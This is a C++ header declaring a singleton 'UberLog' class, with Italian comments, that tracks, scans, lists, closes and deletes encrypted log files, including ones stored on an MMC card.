#pragma once
#include "Common.h"
#include "Encryption.h"

BOOL SortByDate(const LogInfo& lInfo, const LogInfo& rInfo);

class UberLog
{
private:
	/**
	* Definizioni per la classe singleton
	*/
	static UberLog *Instance;
	static volatile LONG lLock;

	HANDLE hUberLogMutex;

	private: list<UberStruct> *uberList;
	private: Encryption *encryptionObj;

	/**
	* Device e' una classe singleton
	*/
	private: BOOL IsInUse(WCHAR *pwName, BOOL bIsOnMmc = FALSE);
	private: BOOL GetLogFileTime(WCHAR *pwName, BOOL bIsOnMmc, FILETIME *ft);

	public: static UberLog* self();
	public: void Clear();
	public: BOOL Add(WCHAR *pwName, UINT uLogType, UINT uLogSeq, FILETIME ft, BOOL bOnMmc = FALSE);
	public: BOOL Remove(WCHAR *pwName, BOOL bOnMmc);
	public: BOOL Delete(WCHAR *pwName);
	public: BOOL DeleteAll();
	public: BOOL Close(WCHAR *pwName, BOOL bOnMmc);
	public: BOOL ScanLogs();
	public: list<LogInfo>* ListClosed();
	public: list<LogInfo>* ListClosedByType(UINT uLogType);

	public:	UberLog();
	private: ~UberLog();
};
